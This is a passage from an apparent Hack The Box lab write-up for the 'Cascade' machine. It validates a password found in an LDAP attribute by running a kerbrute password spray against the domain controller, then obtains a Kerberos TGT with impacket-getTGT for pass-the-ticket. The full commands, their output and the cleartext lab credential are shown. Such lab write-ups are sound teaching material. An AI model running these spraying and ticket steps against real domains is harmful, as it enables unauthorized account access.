Validation


The LDAP service running on the port 389 with anonymous access enabled allowed me to enumerate and get the detailed overview about the target domain. While doing so, I discovered that what appears to be a CLEARTEXT password hard-coded into one of the LDAP attributes of the r.thompson user. Here, I will attempt to validate the credential against the target KDC server and create a TGT for better OPSEC

┌──(kali㉿kali)-[~/archive/htb/labs/cascade]
└─$ kerbrute passwordspray -d CASCADE.LOCAL --dc casc-dc1.cascade.local users 'rY4n5eva'    
 
    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        
 
version: v1.0.3 (9dad6e1) - 06/26/23 - Ronnie Flathers @ropnop
 
2023/06/26 05:40:25 >  Using KDC(s):
2023/06/26 05:40:25 >  	casc-dc1.cascade.local:88
 
2023/06/26 05:40:35 >  [+] VALID LOGIN:	 r.thompson@CASCADE.LOCAL:rY4n5eva
2023/06/26 05:40:45 >  Done! Tested 17 logins (1 successes) in 20.781 seconds

The password indeed belongs to the r.thompson user

TGT


┌──(kali㉿kali)-[~/archive/htb/labs/cascade]
└─$ impacket-getTGT CASCADE.LOCAL/r.thompson:rY4n5eva -dc-ip $IP
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
 
[*] Saving ticket in r.thompson.ccache

TGT generated for the r.thompson user. The TGT will allow me to continue the operation with the pass-the-ticket technique